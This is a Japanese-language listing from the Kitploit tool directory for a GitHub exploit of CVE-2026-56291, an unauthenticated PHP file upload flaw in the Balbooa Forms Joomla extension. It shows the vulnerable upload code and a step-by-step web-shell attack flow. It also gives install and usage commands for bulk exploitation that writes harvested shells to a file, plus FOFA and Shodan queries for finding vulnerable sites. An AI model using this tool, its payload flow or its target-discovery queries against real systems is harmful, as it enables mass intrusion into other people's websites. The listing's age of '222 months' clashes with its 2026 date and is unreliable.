Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-56291 — Balbooa Forms (com_baforms) < 2.4.1 — 認証なしのファイルアップロードによるRCE(form.uploadAttachmentFile経由)| CVSS 9.8 | CISA KEV | Kitploit
ツール/GitHubGitHub/shinthink/cve-2026-56291
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubshinthink/cve-2026-56291

CVE-2026-56291

Balbooa Forms (com_baforms) < 2.4.1 — 認証なしのファイルアップロードによるRCE(form.uploadAttachmentFile経由)| CVSS 9.8 | CISA KEV

リポジトリを見る
222ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-56291 — Balbooa Forms Joomla 大量RCE エクスプロイト

事前認証なし form.uploadAttachmentFile → CSRFなし → PHPアップロード


概要

CVE-2026-56291 は、Balbooa Forms (com_baforms) Joomla 拡張機能 (< 2.4.1) における、認証不要の任意ファイルアップロードの脆弱性 (CVSS 9.8、クリティカル) です。

フロントエンドタスク form.uploadAttachmentFile は Session::checkToken() を呼び出さず、権限チェックも行いません。アップロードされたファイルは攻撃者の拡張子をそのまま使用します: $fileName = $name . '.' . $ext。ファイルは images/baforms/uploads/form-{id}/ に保存され、PHP として直接実行可能です。

影響を受けるバージョン

バージョンステータス
1.0 – 2.4.0脆弱
2.4.1+修正済み

CISA KEV: 2026年7月10日追加 — 積極的な悪用が確認されました。


脆弱性メカニズム

根本原因

root@kitploit:~
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// Session::checkToken() なし、権限チェックなし、拡張子ホワイトリストなし
$fileName = $name . '.' . $ext;  // 攻撃者の拡張子をそのまま使用
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);

攻撃フロー

root@kitploit:~
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
→ images/baforms/uploads/form-1/shell.php に保存
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE

インストール

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt

使い方

root@kitploit:~
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup

FOFA / Shodan

root@kitploit:~
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"

参考文献

リソースリンク
CISA KEVcisa.gov/known-exploited-vulnerabilities
修正詳細mysites.guru
研究者Phil Taylor

Balbooa とは提携していません。

ツールをダウンロード